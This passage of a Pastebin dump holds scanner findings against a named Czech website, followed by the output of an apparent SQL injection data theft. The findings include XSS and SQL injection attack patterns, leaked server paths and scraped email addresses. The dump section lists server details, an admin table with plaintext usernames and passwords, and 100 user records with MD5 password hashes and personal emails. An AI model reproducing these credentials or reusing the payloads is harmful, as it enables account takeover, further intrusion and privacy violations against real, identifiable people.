  570. Parameter Type: Querystring
  571. Attack Pattern: '"--></style></script><script>netsparker(0x000201)</script>
  572.  
  573. Severity : Medium
  574. Confirmation : Confirmed
  575. URL: http://www.prdel.cz/clanek.php?id=122
  576. Parameter Name: id
  577. Parameter Type: Post
  578. Attack Pattern: '"--></style></script><script>netsparker(0x000483)</script>
  579.  
  580. ||| phpinfo() Information Disclosure
  581.  
  582. Severity : Low
  583. Confirmation: Confirmed
  584. URL: http://www.prdel.cz/phpinfo.php
  585. Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
  586.  
  587. ||| File Upload Functionality Identified
  588.  
  589. Severity : Information
  590. Confirmation: Confirmed
  591. URL: http://www.prdel.cz/registrace.php
  592. Form Name: ico
  593.  
  594. Severity : Information
  595. Confirmation: Confirmed
  596. URL: http://www.prdel.cz/reg_edit.php
  597. Form Name: ico
  598.  
  599.  
  600. ||| MySQL Database Identified
  601.  
  602. Severity : Information
  603. Confirmation: Confirmed
  604. URL: http://www.prdel.cz/rubrika.php?rub='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
  605. Parameter Name: rub
  606. Parameter Type: Querystring
  607. Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
  608.  
  609. ||| Password Transmitted Over HTTP
  610.  
  611. Severity: Important
  612. Confirmation: Confirmed
  613. URL: http://www.prdel.cz/clanek.php?id=122
  614. Vulnerability Classifications: PCI 6.5.9 OWASP A9 CWE-311 319
  615.  
  616. ||| E-mail Address Disclosure
  617.  
  618. Severity : Information
  619. Confirmation: Confirmed
  620. URL: http://www.prdel.cz/
  621. Found E-mails: polibte.nam@prdel.cz
  622. costrova@prdel.cz
  623.  
  624. Severity : Information
  625. Confirmation: Confirmed
  626. URL: http://www.prdel.cz/starsi_prispevky.php?co=
  627. Found E-mails: postreleny@gmail.com
  628. kanalnik987@seznam.cz
  629. admin@netlife.502.cz
  630. intelvodrazka@seznam.cz
  631. SexyRadaBieber@seznam.cz
  632. polibte.nam@prdel.cz
  633.  
  634.  
  635. ||| [Possible] Internal Path Leakage (*nix)
  636.  
  637. Severity : Information
  638. Confirmation: Confirmed
  639. URL: http://www.prdel.cz/phpinfo.php
  640. Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
  641. Identified Internal Path(s):
  642.  
  643. /usr/obj/usr/src/sys/GENERIC
  644. /usr/local/etc/php&#039;
  645. /usr/local&#039;
  646. /usr/local/man&#039;
  647. /usr/local/info/&#039;
  648. /usr/local/etc
  649. /usr/local/etc/php.ini
  650. /usr/local/etc/php
  651. /usr/local/etc/php/extensions.ini
  652. /var/log/php_errors.log
  653. /usr/local/lib/php/20090626
  654. /usr/local/share/pear
  655. /usr/sbin/sendmail&nbsp;-t&nbsp;-i&nbsp;
  656. /usr/sbin/sendmail
  657. /usr/home/costra/web/prdel.cz/www/phpinfo.php
  658. /usr/local/bin/php-cgi
  659. /usr/sbin:/usr/bin
  660. /usr/home/costra/web/prdel.cz/www
  661.  
  662. ||| report db:
  663.  
  664. Target: http://www.prdel.cz/index_vypis.php?id=-1 OR 17-7=10
  665. Host IP: 127.0.0.1 (Proxy IP)
  666. Web Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2
  667. Powered-by: PHP/5.3.8
  668. DB Server: MySQL
  669. Resp. Time(avg): 6465 ms
  670. Current User: prdel_cz@localhost
  671. Sql Version: 5.5.17
  672. Current DB: prdel_cz
  673. System User: prdel_cz@localhost
  674. Host Name: fubar.sigpipe.cz
  675. Installation dir: /usr/local
  676. DB User: 'prdel_cz'@'localhost'
  677. Data Bases: information_schema, prdel_cz, test
  678.  
  679. Data Base: prdel_cz
  680. Table: prd_autent
  681. Total Rows: 15
  682.  
  683. Column found: id
  684. Column found: jmeno
  685. Column found: heslo
  686. Column found: podpis
  687. Column found: mail
  688. Column found: funkce
  689. Column found: major
  690.  
  691. Count(*) of prdel_cz.prd_autent is 15
  692. //--------------------------------------------------------------------------------
  693. id jmeno heslo podpis mail funkce major
  694.  
  695. 1 costra kost22 Costra costrova@prdel.cz 2
  696. 2 sowanso route66 Sowanso sowansova@prdel.cz 2
  697. 3 bahamaz baha22 Bahamaz polibte.nam@prdel.cz redaktor 2
  698. 4 nikdo asxsfd22s polibte.nam@prdel.cz 0
  699. 5 blafunka blaf22 Blafunka redaktorka 1
  700. 6 neznamy nez22 0
  701. 7 krysar krysa22 Krysa redaktor redaktor 0
  702. 8 corvin cor22vin Corvin corvinova@prdel.cz 2
  703. 9 mucker muck22 Mucker 0
  704. 10 tiskar tisk22 tiska polibte.nam@prdel.cz 0
  705. 11 Blackfloyd bla22flo Blackfloyd blackfloyd@centrum.cz 0
  706. 12 Mic mi22c Mic 0
  707. 13 sob sob66 Sob jiri.sobotka@post.cz spoluredaktor 1
  708. 14 greenspace wwwqq Greenspace 0
  709. 15 redakce dsfreiou redakce polibte.nam@prdel.cz 0
  710. --------------------------------------------------------------------------------//
  711.  
  712. -----------------------------------------------------------------------------------**
  713. Count(*) of prdel_cz.prd_reg is 3614
  714.  
  715. Column found: id
  716. Column found: login
  717. Column found: heslo
  718. Column found: mail
  719. Column found: datum_reg
  720. Column found: zeme
  721. Column found: podpis
  722. Column found: opravneni
  723. Column found: popis
  724. Column found: posl_posta
  725. Column found: nova_posta
  726. Column found: edit
  727. Column found: od_datum
  728. Column found: do_datum
  729. Column found: id_vlozil
  730.  
  731. -- Added only the first 100 items ;)
  732.  
  733. id login heslo mail podpis popis
  734. 1 d7e77c835af3d2a803c1cf28d60575bc neregistrov
  735. 2 Costra 413a54249f7a332a50d2242b6f341c65 costrova@prdel.cz Costra
  736. 3 Sowanso 151de84cca69258b17375e2f44239191 sowansova@prdel.cz Sowanso redaktor press
  737. 4 mucker c430d630174a7562f316de1422d7aad0 mucker@acid.cz Mucker
  738. 7 zblnk a369371bfdee5bf8a86b7855a22dd4da kika_badinska@yahoo.com
  739. 8 Zuzanka c07fefbae558f73d32686dec591af0ac suzzn66@hotmail.com
  740. 9 Hajdalak cb9a573872ba723dca2c7200e94f5eae prdelac@atlas.cz
  741. 10 Achojda fad3d364b57482bc8554ffa0fc8b66d6 Petulka.broucek@email.cz
  742. 11 Blackfloyd fb166902e26da020adb9e98a06069b06 blackfloyd@centrum.cz Blackfloyd redaktor
  743. 12 mikasyko 53c04118df112c13a8c34b38343b9c10 mikasyko@quick.cz
  744. 13 Milhaus18 827ccb0eea8a706c4c34a16891f84e7b Mafiouzis@seznam.cz
  745. 14 BoB d38ee19a4815c4aeba48227913092a6e robert.m@seznam.cz Bob redaktor
  746. 15 kali 4e4f523705f88c7253fc492d5a45743a jacho@post.cz
  747. 16 Krysar 81dc9bdb52d04dc20036dbd8313ed055 Krysa retraktor s p??alou
  748. 17 Drag 4edb2dc80889b1aec708ec4730f22387 kenilej666rtep@seznam.cz
  749. 18 Mirage 6cdc2b547529980d7f5e3b049b5150c9 xmirage@seznam.cz
  750. 19 Jitulinka c004b41d7921885f30c6474346fd2093 jtomanova@atlas.cz
  751. 20 jeniffer 22cb90807a19a5e2044756b089fa43ff
  752. 21 juppe 4790dfcb68fb43663e5ea74812cfc303 juppe@post.cz
  753. 22 Polibte.mi 0bcd844c7341754504e7e7f7a6582612 royman@email.cz
  754. 23 DjEm 2ce1ec32abcc09b95e64b14a9 1f2 f0450c1 sexibj@seznam.cz
  755. 24 06b2af75179fb94be097af182a442a4a michalgavlik@atlas.cz
  756. 25 P.P. 6ad61cf51456e20a2b6d8db294314de8
  757. 26
  758. 27 Petrd petrdj@post.cz
  759. 28 lunochod f39e6bec5195ca34d8b1cd33573f32a3 bilk7a@gytu.cz
  760. 29 Test 098f6bcd4621d373cade4e832627b4f6
  761. 30 pusa a32afbe54e4fbab0c8c44c01f5b90792 lucie87@centrum.cz
  762. 31 Nick 92c3b916311a5517d9290576e3ea37ad nick.king@quick.cz
  763. 32 vakalva 00fb6e1a2b7112baa41a5d2a85a9b357 Ivaneckaa@atlas.cz
  764. 33 KiiX ea1d6af7146d36d87ec481c3bf83cb35 KiiX@centrum.cz
  765. 34 1stenly 519dbf3fae4a9af1c6b4b4a0fc381ef0
  766. 35 abdul b6575858aecddd94af4abc23a24bf5f2 abdul@easemail.com
  767. 36 Lilith 2aee1c40199c7754da766e61452612cc lilith.d@email.cz
  768. 37 K.C. e3928a3bc4be46516aa33a79bbdfdb08 k.c.goodspeed@seznam.cz
  769. 38 gulasmen 738a6457be8432bab553e21b4235dd97 gulasmen@centrum.cz
  770. 39 milan 4bff2b649206a5609914986c92d06e12 vo.lomnice@atlas.cz
  771. 45 Delvita 37b43a655dec0e3504142003fce04a07 Deathmetal.Deicide@seznam.cz
  772. 46 mutant pepa 6074c6aa3488f3c2dddff2a7ca821aab mutantpepa@seznam.cz
  773. 47 Guppy aa47f8215c6f30a0dcdb2a36a9f4168e daniel.bazant@worldonline.cz
  774. 48 Brom_O_berin cc1f891423db1ee24498e76f3b107bbe berin@seznam.cz Brom O`berin
  775. 49 Crysa 76d084c2c90b5a76e7f2ca9a1a2f3980
  776. 50 medulka 0ea711391df8d060f4f81141e192814e handa@can.com
  777. 51 Prd f5467257608e18e5347354fe9198309b Marcutio@seznam.cz
  778. 52 Krist b46b30c3eda21e2fd3337bd5c0c0d486 kristous@seznam.cz
  779. 53 Martin Philippi 034483eb25564607c159035ed87a0c21 philippim@seznam.cz
  780. 54 Aaliyah 6813ad2917a9674bdf5c8f8bb2a04deb wu@email.cz
  781. 55 Pavel ca3ec598002d2e7662e2ef4bdd58278b p.vosahlik@wo.cz
  782. 56 Fluke f5f2e5896162f870b47efde00fc12894 flukeho@email.cz
  783. 57 radek 25df35de87aa441b88f22a6c2a830a17 freeman.t@centrum.cz
  784. 58 blech 1cca5f8a2bc5f4cc5b0782325eea2ee1 blech@centrum.cz
  785. 59 Magoor b3e654e3acf57cfbe6eb7e4a682ac740 magoor@click.cz
  786. 60 Mrs love d9479746ea51a4177f8bc092c5db7b8d SvrcinovaM@seznam.cz
  787. 61 Lenunka a384b6463fc216a5f8ecb6670f86456a lenunka@centrum.cz
  788. 62 hnismatlavej 97edfa43843271c6a4146d888ba9696f barpos@post.cz
  789. 63 prdelnice 055705420655acce96cfe0ca22b38bcc narciska@freemejl.cz
  790. 64 perak 076e1f7429091d4688b28b0f4e3374d1
  791. 65 xzoombikx e10adc3949ba59abbe56e057f20f883e xzoombikx@freemejl.cz
  792. 66 sleeva f666a8be6b2e0c1f0f66c58060124316 euphorion@post.cz
  793. 67 Marcela e60c7e24808655f86ceed8cb7d3e536d MarcelaCh@seznam.cz
  794. 68 Marylin 4cbfe67340292113c37189ac59871696 a.vitkova@seznam.cz
  795. 69 Bossak 955db0b81ef1989b4a4dfeae8061a9a6 ilovelunetic@seznam.cz
  796. 70 Tom 9ad97add7f3d9f29cd262159d4540c96 tomaskonva@volny.cz
  797. 71 j 3e55517aea64f6d368ef836459f15182 tchlup@soubce.cz
  798. 72 Sexy.cat 5bbc1df343ed3672a1ffd93d2de417ae Sexy.cat@seznam.cz
  799. 73 bisekmartin 955db0b81ef1989b4a4dfeae8061a9a6 martin.bisek@worldonline.cz
  800. 74 PanKlobouk 8627652212182177254630a62f81d801 lord.edmond@centrum.cz
  801. 75 Shadya 318fbaf5acbf2b69a202de4c6df4cd2c Shadya@atlas.cz
  802. 76 Adam 7d3e28d14440d6c07f73b7557e3d9602 zead@post.cz
  803. 77 Sraida 153697b4d766ede6971ee05a9d42e86c -Dido-@quick.cz
  804. 78 Mistr 140548adadcd75f4918901e83de48ebd
  805. 79 Charlie bf779e0933a882808585d19455cd7937 k.kovar@email.cz
  806. 80 Giltanas 02b65838e9d004709a94c8b3b46f01b3 ronovskv@gjr.cz
  807. 81 Bolik ec733571061b115252c5e38269cce13f bolik@seznam.cz
  808. 82 milka 827ccb0eea8a706c4c34a16891f84e7b
  809. 83 roger 3aa26518a06fdd715a5c93af12d8cdc5
  810. 84 nicky2001 f39322759f5c3e0db8d32b41a3312904 nicky2001@seznam.cz
  811. 85 kocur cd62562929ed9d64a1fda3c911f9de9d
  812. 86 ZZsup c4459bc0bba5a7fd3a0ee521c2cbbc18 ZZsup@guick.cz
  813. 87 mecma a72e6e60313605028784645efb13ca5c mecma@seznam.cz
  814. 88 Dub 6d577dceec0057176f6a08dba512af40 doubek.jirka@quick.cz
  815. 89 kuglimug 59f9d76078b0422c34ce11f8bee61373
  816. 90 Hana 785bb1e5e77a14325fd31ebeae836fff H.Melkusova@seznam.cz
  817. 91 Olinka ecc5b00cf0f3653b868990f8e3c7243f olinka.stolfova@post.cz
  818. 92 Ivosek 0eacfc1178fe6ff4265ba27dc69656be IvoVelicka@seznam.cz
  819. 93 jitus ebd5057f5e0c63cd89fb41e30f3c0077
  820. 94 Cindy 76bd0d90a1b88cfec6068f88d6d04dff
  821. 95 88d52b35e5147c0115bcd5c5dd7f7e3f
  822. 96 maus007 fc5cdb17ceffded1e53d9be32e54ebb1 maus007@seznam.cz
  823. 97 dextra 587c5b83f70ff651700e3b75953fb9d7
  824. 98 martina 2f0714f5365318775c8f50d720a307dc
  825. 99 chozearmando 17e94cd7242c7f3b9022eacf5855fe91 chozearmando@xko.cz
  826. 100 satan 87df2cd1570fd297de238aeee667fe0a
  827.  
  828. -----------------------------------------------------------------------------------**
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!